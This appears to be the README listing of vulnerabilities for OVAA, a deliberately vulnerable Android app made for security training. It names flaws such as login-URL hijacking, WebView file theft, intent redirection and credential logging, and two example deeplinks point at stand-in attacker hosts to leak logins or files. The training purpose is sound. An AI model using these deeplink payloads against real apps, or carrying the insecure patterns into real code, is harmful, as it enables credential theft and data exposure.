Oversecured Vulnerable Android App
No Data
OVAA (Oversecured Vulnerable Android App) is an Android app that aggregates all the platform's known and popular security vulnerabilities.
This section only includes the list of vulnerabilities, without a detailed description or proof of concept. Examples from OVAA will receive detailed examination and analysis on our blog.
login_urlvia deeplink
oversecured://ovaa/login?url=http://evil.com/. Leads to the user's user name and password being leaked when they log in.
android:grantUriPermissions="true") via deeplink
oversecured://ovaa/grant_uri_permissions. The attacker's app needs to process
oversecured.ovaa.action.GRANT_PERMISSIONSand pass intent to
setResult(code, intent)with flags such as
Intent.FLAG_GRANT_READ_URI_PERMISSIONand the URI of the content provider.
oversecured://ovaa/webview?url=....
oversecured://ovaa/webview?url=http://evilexample.com. An attacker can use the vulnerable WebView setting
WebSettings.setAllowFileAccessFromFileURLs(true)in the
WebViewActivity.javafile to steal arbitrary files by sending them XHR requests and obtaining their content.
LoginActivityby supplying an arbitrary Intent object to
redirect_intent.
MainActivityby intercepting an activity launch from
Intent.ACTION_PICKand passing the URI to any file as data.
MainActivitycontaining credentials. The attacker can register a broadcast receiver with action
oversecured.ovaa.action.UNPROTECTED_CREDENTIALS_DATAand obtain the user's data.
MainActivitywith action
oversecured.ovaa.action.WEBVIEW, containing the user's encrypted data in the query parameter
token.
DeleteFilesSerializabledeserialization object.
MemoryCorruptionParcelableobject.
MemoryCorruptionSerializableobject.
TheftOverwriteProvidervia path-traversal in the value
uri.getLastPathSegment().
InsecureLoggerService. Leak of credentials in
LoginActivity
Log.d("ovaa", "Processing " + loginData).
WeakCrypto.
OversecuredApplicationby launching code from third-party apps with no security checks.
oversecured.ovaa.fileprovidercontent provider in
rootentry.
strings.xmlin
test_urlentry.
Licensed under the Simplified BSD License
Copyright (c) 2020, Oversecured Inc
https://oversecured.com/